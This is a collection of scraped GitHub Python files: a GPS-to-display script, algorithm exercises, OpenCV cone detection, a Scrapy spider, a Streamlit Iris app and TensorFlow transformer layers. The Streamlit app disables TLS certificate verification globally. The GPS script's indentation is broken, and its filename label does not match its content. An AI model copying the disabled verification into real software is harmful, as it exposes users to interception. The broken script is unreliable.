day_18_find_middle_element.py
|
py
| 1,161 |
python
|
en
|
code
| 0 |
github-code
|
6
|
38902423747
|
import time
import subprocess
import digitalio
import board
from PIL import Image, ImageDraw, ImageFont
import adafruit_rgb_display.st7789 as st7789
import pynmea2
import sys
from subprocess import Popen, PIPE
import serial
import io
# Configuration for CS and DC pins (these are FeatherWing defaults on M0/M4):
cs_pin = digitalio.DigitalInOut(board.CE0)
dc_pin = digitalio.DigitalInOut(board.D25)
reset_pin = None
# COLORS
ORGANGE = "#ffa600"
WHITE = "#FFFFFF"
# Config for display baudrate (default max is 24mhz):
BAUDRATE = 64000000
# Setup SPI bus using hardware SPI:
spi = board.SPI()
# Create the ST7789 display:
disp = st7789.ST7789(
spi,
cs=cs_pin,
dc=dc_pin,
rst=reset_pin,
baudrate=BAUDRATE,
width=135,
height=240,
x_offset=53,
y_offset=40,
)
# Create blank image for drawing.
# Make sure to create image with mode 'RGB' for full color.
height = disp.width # we swap height/width to rotate it to landscape!
width = disp.height
image = Image.new("RGB", (width, height))
rotation = 90
# Get drawing object to draw on image.
draw = ImageDraw.Draw(image)
# Draw a black filled box to clear the image.
draw.rectangle((0, 0, width, height), outline=0, fill=(0, 0, 0))
disp.image(image, rotation)
# Draw some shapes.
# First define some constants to allow easy resizing of shapes.
padding = -2
top = padding
bottom = height - padding
# Move left to right keeping track of the current x position for drawing shapes.
x = 0
# Alternatively load a TTF font. Make sure the .ttf font file is in the
# same directory as the python script!
# Some other nice fonts to try: http://www.dafont.com/bitmap.php
font = ImageFont.truetype("/usr/share/fonts/truetype/noto/NotoMono-Regular.ttf", 24)
# Turn on the backlight
backlight = digitalio.DigitalInOut(board.D22)
backlight.switch_to_output()
backlight.value = True
while True:
iterator = 0
# Get output from std
with Popen(["gpspipe", "/dev/ttyACM0", "-r"], stdout=PIPE, bufsize=1,
universal_newlines=True) as p:
for line in p.stdout:
iterator = iterator + 1
# counting up to 4 lines ignores the headers that would otherwise be unfit for parsing
if(iterator >= 4):
                # handling errors is critical - parsing and attribute access can fail on malformed sentences
                try:
                    gpsmsg = pynmea2.parse(line)
latitude = gpsmsg.lat
longitude = gpsmsg.lon
#altitude = gpsmsg.alt
y = top
if(latitude != 0 and latitude != "null" and latitude != "NULL" and latitude != "" and latitude != " "):
#print(latitude)
draw.rectangle((0, 0, width, height), outline=0, fill=0)
#Write GPS data to screen
#y = top
draw.text((x, y), "LAT: " + latitude, font=font, fill=WHITE)
y += font.getsize("LAT")[1]
if(longitude != 0 and longitude != "null" and longitude != "NULL" and longitude != "" and longitude != " "):
draw.text((x, y), "LON: " + longitude, font=font, fill=WHITE)
y += font.getsize("LON")[1]
#if(altitude != 0 and altitude != "null" and altitude != "NULL" and altitude != "" and altitude != " "):
#draw.text((x, y), "ALT: " + altitude, font=font, fill=WHITE)
#y += font.getsize("ALT")[1]
except:
print("cannot parse that")
#pass
disp.image(image, rotation)
time.sleep(0.1)
|
vwls/toolbox
|
gps_data_to_screen.py
|
gps_data_to_screen.py
|
py
| 4,226 |
python
|
en
|
code
| 0 |
github-code
|
6
|
38290618145
|
# Given an array of intervals, find the next interval of each interval.
# In a list of intervals, for an interval ‘i’ its next interval ‘j’ will have
# the smallest ‘start’ greater than or equal to the ‘end’ of ‘i’.
# Write a function to return an array containing indices of the next interval of each input interval.
# If there is no next interval of a given interval, return -1.
# It is given that none of the intervals have the same start point.
from heapq import *
class Interval:
def __init__(self, start, end):
self.start = start
self.end = end
def find_next_interval(intervals):
    n = len(intervals)
    # Two max-heaps (simulated with negated values): one on starts, one on ends.
    max_start_heap, max_end_heap = [], []
    result = [-1] * n
    for i in range(n):
        heappush(max_start_heap, (-intervals[i].start, i))
        heappush(max_end_heap, (-intervals[i].end, i))
    # Process intervals from the largest end downwards, reusing the start heap.
    for _ in range(n):
        top_end, end_index = heappop(max_end_heap)
        if -max_start_heap[0][0] >= -top_end:
            top_start, start_index = heappop(max_start_heap)
            # Pop starts until we reach the smallest start that is still >= this end.
            while max_start_heap and -max_start_heap[0][0] >= -top_end:
                top_start, start_index = heappop(max_start_heap)
            result[end_index] = start_index
            # Push the start back; it may also be the next interval of other intervals.
            heappush(max_start_heap, (top_start, start_index))
    return result
def main():
result = find_next_interval(
[Interval(2, 3), Interval(3, 4), Interval(5, 6)])
print("Next interval indices are: " + str(result))
result = find_next_interval(
[Interval(3, 4), Interval(1, 5), Interval(4, 6)])
print("Next interval indices are: " + str(result))
main()
|
nanup/DSA
|
9. Two Heaps/436. Find Right Interval.py
|
436. Find Right Interval.py
|
py
| 1,263 |
python
|
en
|
code
| 0 |
github-code
|
6
|
4657631542
|
import random
import copy
# Parameters used purely for testing the algorithm
seed_value = 60  # random seed
kolvo_prov = 10  # number of test runs
arr_legth = 20  # length of the lists being tested
random.seed(seed_value)  # set the seed
# The quick sort algorithm itself.
def quick_sort(array):
if len(array) < 2:
return array
else:
index = random.randrange(0, len(array))
middle = array[index]
del array[index]
lower_arr = [i for i in array if i <= middle]
upper_arr = [j for j in array if j > middle]
return quick_sort(lower_arr) + [middle] + quick_sort(upper_arr)
# Test loop for the algorithm. It creates two identical lists with random values and sorts one with the built-in
# sort method and the other with the quick sort algorithm. If everything is fine it prints True, otherwise it
# prints False.
for _ in range(kolvo_prov):
prov = True
arr1 = [random.randrange(-100, 100) for _ in range(arr_legth)]
arr2 = copy.deepcopy(arr1)
    print(f'\nList 1: {arr1}\nList 2: {arr2}')
arr1.sort()
arr2 = quick_sort(arr2)
print(f"Разные ли объекты (списки):{arr1 is not arr2}")
print(
f'Массив отсортированный встроенной функцией (1 массив):\n{arr1}\n'
f'Массив отсортированный быстрой сортировкой (2 массив):\n{arr2}')
seed_value += 1
for arr_index in range(arr_legth):
if not arr1[arr_index] == arr2[arr_index]:
prov = False
break
print(f"Одинаково ли отсортированы списки: {prov}")
|
WeideR66/littlepythonprojects
|
quick_sort_alg.py
|
quick_sort_alg.py
|
py
| 2,022 |
python
|
ru
|
code
| 0 |
github-code
|
6
|
33415585016
|
import cv2 as cv
import numpy as np
from matplotlib import pyplot as plt
import scipy.optimize as optimize
# Opening image
img = cv.imread("red.png")
# Uncomment this and run the program to make sure the
# convex_hull_pointing_up algorithm works
# img = cv.rotate(img, cv.ROTATE_180)
# OpenCV stores images as BGR by default
# so the following two lines flip the color channels
# to RGB and HSV
img_rgb = cv.cvtColor(img, cv.COLOR_BGR2RGB)
img_hsv = cv.cvtColor(img, cv.COLOR_BGR2HSV)
# Create the environment of the picture
plt.subplot(1, 1, 1)
plt.imshow(img_rgb)
# Defining thresholds to isolate the HSV pixels that
# have the desired color
img_thresh_low = cv.inRange(img_hsv, np.array([0, 135, 135]), np.array([15, 255, 255]))
img_thresh_high = cv.inRange(img_hsv, np.array([159, 135, 135]), np.array([179, 255, 255]))
# Add the two threshold maps together
img_thresh = cv.bitwise_or(img_thresh_low, img_thresh_high)
# Use erosion followed by dilation to remove noise
kernel = np.ones((5, 5))
img_thresh_opened = cv.morphologyEx(img_thresh, cv.MORPH_OPEN, kernel)
# Blur the image slightly
img_thresh_blurred = cv.medianBlur(img_thresh_opened, 5)
# Find edges with the Canny edge detection algorithm
img_edges = cv.Canny(img_thresh_blurred, 70, 255)
# Get contours
contours, _ = cv.findContours(np.array(img_edges), cv.RETR_EXTERNAL, cv.CHAIN_APPROX_SIMPLE)
# Approximate contours using the Douglas-Peucker algorithm
approx_contours = []
for c in contours:
approx = cv.approxPolyDP(c, 5, closed=True)
approx_contours.append(approx)
# Find convex hulls of the contours
all_convex_hulls = []
for ac in approx_contours:
all_convex_hulls.append(cv.convexHull(ac))
# Remove any hulls with more than 10 or less than 3 points
convex_hulls_3to10 = []
for ch in all_convex_hulls:
if 3 <= len(ch) <= 10:
convex_hulls_3to10.append(cv.convexHull(ch))
# Define a function to check if a hull is pointing up
def convex_hull_pointing_up(ch: np.ndarray) -> bool:
points_above_center, points_below_center = [], []
_, y, _, h = cv.boundingRect(ch)
vertical_center = y + h / 2
for point in ch:
if point[0][1] < vertical_center:
points_above_center.append(point)
elif point[0][1] >= vertical_center:
points_below_center.append(point)
x_above, _, w_above, _ = cv.boundingRect(np.array(points_above_center))
x_below, _, w_below, _ = cv.boundingRect(np.array(points_below_center))
return x_above <= x_below + w_below and x_above + w_above <= x_below + w_below \
and x_above >= x_below and x_above + w_above >= x_below
cones = []
bounding_rects = []
# Filter out the contours that aren't pointing up
for ch in convex_hulls_3to10:
if convex_hull_pointing_up(ch):
cones.append(ch)
rect = cv.boundingRect(ch)
bounding_rects.append(rect)
img_res = img_rgb.copy()
# Draw rectangles around the identified cones
for rect in bounding_rects:
x, y, w, h = rect
cv.rectangle(img_res, (x, y), (x + w, y + h), (0, 255, 0), 2)
# Fit best-fit lines to the left and right sides of the screen
cone_points_left = [(rect[0] + rect[2] / 2, rect[1] + rect[3] / 2) for rect in bounding_rects if rect[0] + rect[2] / 2 < img_res.shape[1] / 2]
cone_points_right = [(rect[0] + rect[2] / 2, rect[1] + rect[3] / 2) for rect in bounding_rects if rect[0] + rect[2] / 2 > img_res.shape[1] / 2]
def least_squares(x, y):
# Create the least squares objective function.
def func(x, a, b):
return a * x + b
popt, pcov = optimize.curve_fit(func, x, y)
return popt
# Get best fit lines for these points
a1, b1 = least_squares(np.array([i[0] for i in cone_points_left]), np.array([i[1] for i in cone_points_left]))
a2, b2 = least_squares(np.array([i[0] for i in cone_points_right]), np.array([i[1] for i in cone_points_right]))
# Draw the best-fit lines on the image
cv.line(img_res, [0, int(b1)], [3000, int((3000 * a1) + b1)], (255, 1, 1), 5)
cv.line(img_res, [0, int(b2)], [3000, int((3000 * a2) + b2)], (255, 1, 1), 5)
# Display and save the final output image
plt.imshow(img_res)
plt.savefig("answer.png")
plt.show()
|
IamParvSinghal/Wisconsin_Autonomous
|
CV.py
|
CV.py
|
py
| 4,280 |
python
|
en
|
code
| 0 |
github-code
|
6
|
12267302602
|
# -*- coding: utf-8 -*-
import scrapy
from collections import OrderedDict
class BriefingEarningsSpider(scrapy.Spider):
name = 'briefing_earnings'
allowed_domains = ['www.briefing.com']
start_urls = ['https://www.briefing.com/Inv/content/Auth/Calendar/Earnings/week1.htm'] # Current week (week1)
def parse(self, response):
dates_lst = response.xpath('//*[@class="calDATE"]/text()').getall() # Get list of days (dates)
dates = {dates_lst[day]: day for day in range(len(dates_lst))}
        dates_sort = OrderedDict(sorted(dates.items(), key=lambda x: x[1]))  # Ordered dict to preserve the day order
for i, day in enumerate(dates_sort):
block = response.xpath('//*[@class="calDATE"]/following-sibling::ul')[i] # Block for day
events_lst = block.xpath('.//div[contains(@class,"calEVENT")]') # Block for ticket
tickets = OrderedDict()
for event in events_lst:
ticket = event.xpath('.//span/@data-ticker-search').get()
name = event.xpath('.//strong/text()').get()
surprise_value = event.xpath(
'.//span[contains(text(), "Surprise:")]/following-sibling::span/text()').get()
act_value = event.xpath('.//span[contains(text(), "Act:")]/following-sibling::span/text()').get()
cons_value = event.xpath('.//span[contains(text(), "Cons:")]/following-sibling::span/text()').get()
tickets.update({ticket: {'name': name,
'surprise_value': surprise_value,
'actual_value': act_value,
'consensus_value': cons_value}})
dates_sort.update({day: tickets}) # Add all tickets with values for day
yield dates_sort
|
kompotkot/WebScraper-Stocksinplay
|
stocksinplay/spiders/briefing_earnings.py
|
briefing_earnings.py
|
py
| 1,854 |
python
|
en
|
code
| 0 |
github-code
|
6
|
43918724986
|
import streamlit as st
import pandas as pd
import plotly.express as px
import seaborn as sns
import ssl
ssl._create_default_https_context = ssl._create_unverified_context
st.set_option('deprecation.showPyplotGlobalUse', False)
# Loading dataset
df = pd.read_csv('https://archive.ics.uci.edu/ml/machine-learning-databases/iris/iris.data',
names=['sepal_length', 'sepal_width', 'petal_length', 'petal_width', 'class'])
st.title('Exploratory Data Analysis of the Iris Dataset')
st.header('This app allows you to explore the Iris dataset and visualize the data using various plots.')
st.subheader("DataFrame")
st.dataframe(df)
selected_column = st.sidebar.selectbox('Select a column to visualize', df.columns)
st.write("Histogram Plots")
sns.histplot(df[selected_column])
st.pyplot()
st.write("Scatter plot")
x_axis = st.sidebar.selectbox('Select the x-axis', df.columns)
y_axis = st.sidebar.selectbox('Select the y-axis', df.columns)
fig = px.scatter(df, x=x_axis, y=y_axis)
st.plotly_chart(fig)
st.write("Pair Plot")
sns.pairplot(df, hue='class')
st.pyplot()
st.write("Description of the data")
st.table(df.describe())
st.header('Correlation Matrix')
corr = df.drop(columns=['class']).corr()  # correlations over the numeric columns only ('class' is categorical)
sns.heatmap(corr, annot=True)
st.pyplot()
st.header('Boxplot')
fig = px.box(df, y=selected_column)
st.plotly_chart(fig)
selected_class = st.sidebar.selectbox('Select a class to visualize', df['class'].unique())
if st.sidebar.button('Show Violin Plot'):
fig = px.violin(df[df['class'] == selected_class], y=selected_column)
st.plotly_chart(fig)
|
avrabyt/Holiday-coding-session
|
streamlit_app.py
|
streamlit_app.py
|
py
| 1,556 |
python
|
en
|
code
| 3 |
github-code
|
6
|
27937806135
|
#!/usr/bin/python
# coding: utf-8
import base64
import numpy as np
import cv2
import csv
import os
import shutil
import logging
def to_image_string(image_filepath):
    # Read the file as bytes and return a base64-encoded string (Python 3 compatible).
    with open(image_filepath, "rb") as image_file:
        return base64.b64encode(image_file.read()).decode("ascii")
def from_base64(base64_data):
    # Decode the base64 string back into an image array.
    nparr = np.frombuffer(base64.b64decode(base64_data), np.uint8)
    return cv2.imdecode(nparr, cv2.IMREAD_ANYCOLOR)
# clean all non-alphanumberic characters
def strip(string):
words = string.split()
words = [word for word in words if "#" not in word]
string = " ".join(words)
clean = ""
for c in string:
if str.isalnum(c) or (c in [" ", ".", ","]):
clean += c
return clean
# creating CSV header
def create_csv(filename):
with open(filename, "w+", newline="", encoding="utf-8") as save_file:
writer = csv.writer(save_file)
writer.writerow(["Author", "uTime", "Text"])
def write_to_csv(filename, data):
with open(filename, "a+", newline="", encoding="utf-8") as save_file:
writer = csv.writer(save_file)
writer.writerow(data)
def empty_folder(folder):
for filename in os.listdir(folder):
file_path = os.path.join(folder, filename)
try:
if os.path.isfile(file_path) or os.path.islink(file_path):
os.unlink(file_path)
elif os.path.isdir(file_path):
empty_folder(file_path)
except Exception as e:
logging.info("Failed to delete %s. Reason: %s" % (file_path, e))
def move_file(source, dest):
shutil.move(source, dest)
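# Minimal usage sketch of the CSV helpers (not part of the original module; the
# file name and row values below are hypothetical):
if __name__ == "__main__":
    create_csv("messages.csv")
    write_to_csv("messages.csv", ["Alice", "1700000000", "Hello, world."])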
|
Zyniel/DansePlanningManager
|
src/app/utils.py
|
utils.py
|
py
| 1,569 |
python
|
en
|
code
| 0 |
github-code
|
6
|
72000458749
|
"""Tensorflow transformer layers definition in trident"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import math
import tensorflow as tf
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
from trident import context
from trident.backend import dtype as Dtype
from trident.backend.tensorflow_backend import Layer, Sequential, get_device, ModuleList
from trident.backend.tensorflow_ops import *
from trident.layers.tensorflow_activations import Gelu
from trident.layers.tensorflow_blocks import FullConnect_Block
from trident.layers.tensorflow_layers import Embedding, Dropout, Dense
from trident.layers.tensorflow_normalizations import LayerNorm
ctx = context._context()
_float_dtype = Dtype.float32# if ctx.amp_available == True and ctx.is_autocast_enabled == True and get_device() == 'cuda' else Dtype.float32
__all__ = ['Mlp','BERT','BERTEmbedding','PositionalEmbedding','PositionwiseFeedForward','DropPath','Attention','MultiHeadedAttention','SublayerConnection','TransformerBlock']
def Mlp(hidden_features=None, out_features=None,dropout_rate=0):
return Sequential(
FullConnect_Block(num_filters=hidden_features,activation=Gelu(),dropout_rate=dropout_rate,normalization=None),
FullConnect_Block(num_filters=out_features, activation=None, dropout_rate=dropout_rate,normalization=None),
)
class PositionalEmbedding(Layer):
def __init__(self, d_model, max_len=512):
super().__init__()
# Compute the positional encodings once in log space.
pe = np.zeros((max_len, d_model))
position = np.expand_dims(np.arange(0, max_len),1)
        div_term = np.exp(np.arange(0, d_model, 2) * -(np.log(10000.0) / d_model))
pe[:, 0::2] = np.sin(position * div_term)
pe[:, 1::2] = np.cos(position * div_term)
pe =to_tensor(np.expand_dims( pe,0))
self.register_buffer('pe', pe)
def forward(self, x, **kwargs):
return self.pe[:, :int_shape(x)[1]]
class PositionwiseFeedForward(Layer):
"Implements FFN equation."
def __init__(self, d_model, d_ff, dropout_rate=0.1):
super(PositionwiseFeedForward, self).__init__()
self.w_1 = Dense(num_filters= d_ff,activation=Gelu())
self.w_2 = Dense(num_filters= d_model)
self.dropout = Dropout(dropout_rate)
def forward(self, x):
return self.w_2(self.dropout(self.w_1(x)))
#
# class PositionEmbeddingSine(Layer):
# """
# This is a more standard version of the position embedding, very similar to the one
# used by the Attention is all you need paper, generalized to work on images.
# """
# def __init__(self, num_pos_feats=64, temperature=10000, normalize=False, scale=None):
# super().__init__()
# self.num_pos_feats = num_pos_feats
# self.temperature = temperature
# self.normalize = normalize
# if scale is not None and normalize is False:
# raise ValueError("normalize should be True if scale is passed")
# if scale is None:
# scale = 2 * math.pi
# self.scale = scale
#
# def forward(self, tensor_list):
# x = tensor_list.tensors
# mask = tensor_list.mask
# assert mask is not None
# not_mask = ~mask
# y_embed = not_mask.cumsum(1, dtype=torch.float32)
# x_embed = not_mask.cumsum(2, dtype=torch.float32)
# if self.normalize:
# eps = 1e-6
# y_embed = y_embed / (y_embed[:, -1:, :] + eps) * self.scale
# x_embed = x_embed / (x_embed[:, :, -1:] + eps) * self.scale
#
# dim_t = torch.arange(self.num_pos_feats, dtype=torch.float32, device=x.device)
# dim_t = self.temperature ** (2 * (dim_t // 2) / self.num_pos_feats)
#
# pos_x = x_embed[:, :, :, None] / dim_t
# pos_y = y_embed[:, :, :, None] / dim_t
# pos_x = torch.stack((pos_x[:, :, :, 0::2].sin(), pos_x[:, :, :, 1::2].cos()), dim=4).flatten(3)
# pos_y = torch.stack((pos_y[:, :, :, 0::2].sin(), pos_y[:, :, :, 1::2].cos()), dim=4).flatten(3)
# pos = torch.cat((pos_y, pos_x), dim=3).permute(0, 3, 1, 2)
# return pos
#
#
# class PositionEmbeddingLearned(Layer):
# """
# Absolute pos embedding, learned.
# """
# def __init__(self, num_pos_feats=256):
# super().__init__()
# self.row_embed = nn.Embedding(50, num_pos_feats)
# self.col_embed = nn.Embedding(50, num_pos_feats)
# self.reset_parameters()
#
# def reset_parameters(self):
# nn.init.uniform_(self.row_embed.weight)
# nn.init.uniform_(self.col_embed.weight)
#
# def forward(self, tensor_list):
# x = tensor_list.tensors
# h, w = x.shape[-2:]
# i = torch.arange(w, device=x.device)
# j = torch.arange(h, device=x.device)
# x_emb = self.col_embed(i)
# y_emb = self.row_embed(j)
# pos = torch.cat([
# x_emb.unsqueeze(0).repeat(h, 1, 1),
# y_emb.unsqueeze(1).repeat(1, w, 1),
# ], dim=-1).permute(2, 0, 1).unsqueeze(0).repeat(x.shape[0], 1, 1, 1)
# return pos
#
class BERTEmbedding(Layer):
"""
    BERT Embedding which consists of the following features
        1. TokenEmbedding : normal embedding matrix
        2. PositionalEmbedding : adding positional information using sin, cos
        3. SegmentEmbedding : adding sentence segment info, (sent_A:1, sent_B:2)
        the sum of all these features is the output of BERTEmbedding
"""
def __init__(self, vocab_size, embedding_dim,cls_idx=1,sep_idx=2,unk_idx=3,pad_idx=0,mask_idx=4, dropout_rate=0.1, add_noise=False,noise_intensity=0.05):
"""
:param vocab_size: total vocab size
:param embed_size: embedding size of token embedding
:param dropout: dropout rate
"""
super().__init__()
self.token = Embedding(num_embeddings=vocab_size,embedding_dim=embedding_dim,padding_idx=pad_idx,add_noise=add_noise,noise_intensity=noise_intensity)
self.position = PositionalEmbedding(d_model=self.token.embedding_dim)
self.segment = Embedding(num_embeddings=3,embedding_dim=self.token.embedding_dim,padding_idx=0)
self.cls_idx=cls_idx
self.sep_idx=sep_idx
self.pad_idx=pad_idx
self.unk_idx=unk_idx
self.mask_idx=mask_idx
self.dropout_rate=dropout_rate
self.dropout = Dropout(dropout_rate)
self.norm=LayerNorm()
self.embedding_dim = embedding_dim
def forward(self, x,segments_tensor=None):
if segments_tensor is None:
segments_tensor = zeros_like(x).to(x.device)
x = self.token(x) + self.position(x) + self.segment(segments_tensor)
x=self.norm(x)
if self.dropout_rate>0 and self.training:
x=self.dropout(x)
return x
class DropPath(Layer):
"""Drop paths (Stochastic Depth) per sample (when applied in main path of residual blocks).
"""
def __init__(self, drop_prob=0):
super(DropPath, self).__init__()
self.drop_prob = drop_prob
def forward(self, x):
#return drop_path(x, self.drop_prob, self.training)
if self.drop_prob == 0. or not self.get_root().training:
return x
keep_prob = 1 - self.drop_prob
shape = (x.shape[0],) + (1,) * (x.ndim - 1) # work with diff dim tensors, not just 2D ConvNets
random_tensor =math_ops.floor( keep_prob +tf.random.uniform(shape, minval=0, maxval=1,dtype=x.dtype))
output = tf.math.divide_no_nan(x,keep_prob) * random_tensor
return output
class Attention(Layer):
"""
Compute 'Scaled Dot Product Attention
"""
def __init__(self, dropout_rate=0.1):
super().__init__()
self.dropout = Dropout(dropout_rate)
def forward(self, query, key, value, mask=None):
scores = math_ops.matmul(query, tf.transpose(key,perm = [0, 1, 3, 2])) / math.sqrt(int_shape(query)[-1])
#scores = math_ops.matmul(tf.transpose(query,perm = [0, 2, 1, 3]), tf.transpose(key,perm = [0, 2, 1, 3])) / math.sqrt(int_shape(query)[-1])
if mask is not None:
if scores.dtype == tf.float32:
scores=where(mask == 1,-1e9,scores)
else:
scores = where(mask == 1, -1e+4, scores)
p_attn = softmax(scores,axis=-1)
if self.dropout is not None:
p_attn = self.dropout(p_attn)
return math_ops.matmul(p_attn, value), p_attn
class MultiHeadedAttention(Layer):
"""
Take in model size and number of heads.
"""
def __init__(self, h, d_model, dropout_rate=0.1):
super().__init__()
assert d_model % h == 0
# We assume d_v always equals d_k
self.d_k = d_model // h
self.h = h
self.linear_layers = ModuleList([Dense(d_model) for _ in range(3)])
self.output_linear = Dense(d_model)
self.attention = Attention(dropout_rate=dropout_rate)
def forward(self, x, mask=None):
batch_size =int_shape(x)[0]
# 1) Do all the linear projections in batch from d_model => h x d_k
query=tf.transpose(tf.reshape(self.linear_layers[0](x),(batch_size, -1, self.h, self.d_k)),perm=[0,2,1,3])
key = tf.transpose(tf.reshape(self.linear_layers[1](x),(batch_size, -1, self.h, self.d_k)),perm=[0,2,1,3])
value = tf.transpose(tf.reshape(self.linear_layers[2](x),(batch_size, -1, self.h, self.d_k)),perm=[0,2,1,3])
# 2) Apply attention on all the projected vectors in batch.
x, attn = self.attention(query, key, value, mask=mask)
# 3) "Concat" using a view and apply a final linear.
x=tf.reshape(tf.transpose(x,perm=[0,2,1,3]),(batch_size, -1, self.h * self.d_k))
return self.output_linear(x)
class SublayerConnection(Layer):
"""
A residual connection followed by a layer norm.
Note for code simplicity the norm is first as opposed to last.
"""
def __init__(self, dropout_rate=0.0):
super(SublayerConnection, self).__init__()
self.norm = LayerNorm()
self.dropout = DropPath(dropout_rate)
def forward(self, x,sublayer):
"Apply residual connection to any sublayer with the same size."
return x + self.dropout(sublayer(self.norm(x)))
class TransformerBlock(Layer):
"""
Bidirectional Encoder = Transformer (self-attention)
Transformer = MultiHead_Attention + Feed_Forward with sublayer connection
"""
def __init__(self, hidden, attn_heads, feed_forward_hidden=None, dropout_rate=0.1):
"""
        :param hidden: hidden size of transformer
:param attn_heads: head sizes of multi-head attention
:param feed_forward_hidden: feed_forward_hidden, usually 4*hidden_size
:param dropout: dropout rate
"""
super().__init__()
if feed_forward_hidden is None:
feed_forward_hidden=4*hidden
self.attention = MultiHeadedAttention(h=attn_heads, d_model=hidden)
self.feed_forward = PositionwiseFeedForward(d_model=hidden, d_ff=feed_forward_hidden, dropout_rate=dropout_rate)
self.input_sublayer = SublayerConnection( dropout_rate=dropout_rate)
self.output_sublayer = SublayerConnection(dropout_rate=dropout_rate)
self.dropout = Dropout(dropout_rate=dropout_rate)
def forward(self, x, mask=None):
x = self.input_sublayer(x, lambda _x: self.attention.forward(_x, mask=mask))
x = self.output_sublayer(x, self.feed_forward)
return self.dropout(x)
class BERT(Layer):
"""
BERT model : Bidirectional Encoder Representations from Transformers.
"""
def __init__(self, vocab_size, hidden=768, n_layers=12, attn_heads=12, dropout_rate=0.1,pad_idx=0):
"""
        :param vocab_size: vocab_size of total words
:param hidden: BERT model hidden size
:param n_layers: numbers of Transformer blocks(layers)
:param attn_heads: number of attention heads
:param dropout: dropout rate
"""
super().__init__()
self.hidden = hidden
self.n_layers = n_layers
self.attn_heads = attn_heads
self.pad_idx=pad_idx
self.dropout_rate=dropout_rate
# paper noted they used 4*hidden_size for ff_network_hidden_size
self.feed_forward_hidden = hidden * 4
# embedding for BERT, sum of positional, segment, token embeddings
self.embedding = BERTEmbedding(vocab_size=vocab_size, embedding_dim=hidden,pad_idx=self.pad_idx)
for i in range(n_layers):
self.add_module('transformer_block{0}'.format(i),TransformerBlock(hidden, attn_heads, hidden * 4, dropout_rate) )
def forward(self, x,segments_tensor=None):
if int_shape(x)[1]==2:
x,segments_tensor=split(x,num_splits=2,axis=1)
x=x.squeeze(1)
segments_tensor=segments_tensor.squeeze(1)
elif segments_tensor is None:
segments_tensor = zeros_like(x, dtype=x.dtype).to(get_device())
# attention masking for padded token
# torch.ByteTensor([batch_size, 1, seq_len, seq_len)
mask =tf.expand_dims(tf.tile(tf.expand_dims(x == self.pad_idx,1),(1, int_shape(x)[1], 1)),1).to(x.dtype)
# embedding the indexed sequence to sequence of vectors
x = self.embedding(x, segments_tensor)
# running over multiple transformer blocks
for name,transformer in self.named_children():
if 'transformer_block' in name:
x = transformer.forward(x, mask)
return x
|
AllanYiin/trident
|
trident/layers/tensorflow_transformers.py
|
tensorflow_transformers.py
|
py
| 13,672 |
python
|
en
|
code
| 74 |
github-code
|
6
|
27956151936
|
# -*- coding: utf-8 -*-
import os
import pickle
#%%
def read_data_from_1810_09466():
# elements in datalist:
# element[0] = R (kpc)
# element[1] = vc (km/s)
# element[2] = sigma- (km/s)
# element[3] = sigma+ (km/s)
# element[4] = syst (km/s) # saved later
dir_path = os.path.dirname(os.path.realpath(__file__))
data_file=dir_path+'/1810_09466.dat'
with open(data_file, 'r') as f:
content = f.readlines()
data_lists = []
for line in content:
if not line.startswith('#') and line.strip():
data_lists.append([float(a) for a in line.split()])
systematics_file = dir_path+'/1810_09466-sys-data.dat'
with open(systematics_file, 'r') as f:
content = f.readlines()
syst_list = []
for line in content:
if not line.startswith('#') and line.strip():
syst_list.append([float(a) for a in line.split()])
relative_syst_list = [data[1] for data in syst_list]
data_values_list = [data[1] for data in data_lists]
syst_list = []
for i in range(len(relative_syst_list)):
syst_list.append(relative_syst_list[i]*data_values_list[i])
counter = 0
for element in data_lists:
element.append(syst_list[counter])
counter += 1
return data_lists
def pickle_results(Analysis, file_name):
data_to_pickle = {
'lnlikelihoods':Analysis.sampler.lnprobability,
'chains':Analysis.sampler.chain,
'acceptance_fractions':Analysis.sampler.acceptance_fraction,
'variable_names':Analysis.variables_key_list,
}
with open(file_name, "wb") as f:
pickle.dump(data_to_pickle,file=f)
def load_pickle_results(file_name):
with open(file_name, "rb") as f:
return pickle.load(f)
#%%
if __name__ == '__main__':
pass
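    # Minimal sketch of the pickle helpers using a dummy stand-in for an Analysis
    # object (the attributes and file name below are hypothetical):
    from types import SimpleNamespace
    dummy = SimpleNamespace(
        sampler=SimpleNamespace(lnprobability=[0.0], chain=[[0.0]], acceptance_fraction=[0.5]),
        variables_key_list=['v0'],
    )
    pickle_results(dummy, 'test_results.pkl')
    print(load_pickle_results('test_results.pkl')['variable_names'])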
|
pabferde/galaxy_dynamics_from_Vc
|
src/GalaxyDynamicsFromVc/datahandling.py
|
datahandling.py
|
py
| 1,894 |
python
|
en
|
code
| 0 |
github-code
|
6
|
11234447623
|
class exc(Exception):
types = {}
types["NV"] = "Not Enough or too many Values. Required at least 2."
types["NB"] = "Non base 2 numbers. . ."
class calculate(exc):
def __init__(self, instance_numbers=[0, 1], output_answer=True):
for items in [(len(instance_numbers) != 2, "NV"), (len([bob for bob in instance_numbers if bob not in [1, 0]]) != 0, "NB")]:
if items[0] != False:
raise exc(exc.types[items[1]])
self.orinst = instance_numbers[0] or instance_numbers[1]
print("[DATA] Number value: %d. . .[DISJUNCTION]"%(self.orinst))
self.andinst = instance_numbers[0] and instance_numbers[1]
print("[DATA] Number value: %d . . .[CONJUCTION]"%(self.andinst))
@property
def calculateIt(self):
cases = {1:0, 0:1}[self.andinst]
print("[DATA] Negative: %d. . ."%(cases) + "\r\x0A" + "\x2D"*25)
final_answer = self.orinst and cases
print("\r\x0A\r\x0A[DATA] Final answer: %d"%(final_answer))
|
noobprogammier/Semiconductor
|
semiconductor.py
|
semiconductor.py
|
py
| 933 |
python
|
en
|
code
| 1 |
github-code
|
6
|
6460491132
|
import random
class bcolors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKCYAN = '\033[96m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
nums = []
for i in range(1, 10):
num = random.randint(1, 100)
nums.append(num)
print(f'{bcolors.OKGREEN}{nums}, size: {len(nums)}{bcolors.ENDC}')
def shellsort(nums):
gap = len(nums)//2
while gap > 0:
for i in range(gap, len(nums)):
temp = nums[i]
j = i
while j >= gap and nums[j - gap] > temp:
nums[j] = nums[j - gap]
j = j - gap
nums[j] = temp
gap = gap // 2
return nums
print(shellsort(nums))
|
JohelPires/codewars
|
shellsort.py
|
shellsort.py
|
py
| 765 |
python
|
en
|
code
| 0 |
github-code
|
6
|
30610778506
